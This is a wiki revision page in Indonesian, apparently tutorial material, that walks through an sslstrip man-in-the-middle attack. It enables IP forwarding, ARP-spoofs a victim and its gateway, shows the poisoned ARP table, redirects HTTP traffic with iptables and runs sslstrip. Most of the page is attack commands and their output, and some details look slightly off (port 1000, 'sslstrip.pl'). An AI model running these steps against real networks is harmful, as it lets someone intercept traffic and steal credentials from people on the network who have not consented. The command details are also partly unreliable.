Difference between revisions of "MITM: sslstrip"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 39: | Line 39: | ||
192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 | 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 | ||
192.168.0.100 ether 08:00:27:45:7a:dc C enp3s0 | 192.168.0.100 ether 08:00:27:45:7a:dc C enp3s0 | ||
| + | |||
| + | Perhatikan MAC address 192.168.0.100 berubah :) .. | ||
| + | |||
redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip). | redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip). | ||
Revision as of 16:44, 4 April 2017
Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.
Cek routing,
route -n netstat -nr
enable forward paket,
echo “1” > /proc/sys/net/ipv4/ip_forward
lakukan arpspoof,
arpspoof -i eth0 -t victimip routerip
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100 192.168.0.106 = ip victim 192.168.0.100 = ip router / gateway / server yang akan di monitor
Cek apakah berhasil, arp -n di 192.168.0.106
arp -n Address HWtype HWaddress Flags Mask Iface 192.168.0.13 ether ec:a8:6b:f8:2e:fc C enp3s0 192.168.0.223 ether d0:04:92:19:cc:38 C enp3s0 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 192.168.0.100 ether 66:31:65:39:62:38 C enp3s0
Setelah arpspoof di jalankan, lakukan arp -n
arp -n Address HWtype HWaddress Flags Mask Iface 192.168.0.13 ether ec:a8:6b:f8:2e:fc C enp3s0 192.168.0.146 ether 08:00:27:45:7a:dc C enp3s0 192.168.0.223 ether d0:04:92:19:cc:38 C enp3s0 192.168.0.7 ether 4c:e6:76:1f:15:4c C enp3s0 192.168.0.100 ether 08:00:27:45:7a:dc C enp3s0
Perhatikan MAC address 192.168.0.100 berubah :) ..
redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000
Jalankan sslstrip agar listen pada port 1000
sslstrip -l 1000 python sslstrip.pl –l 1000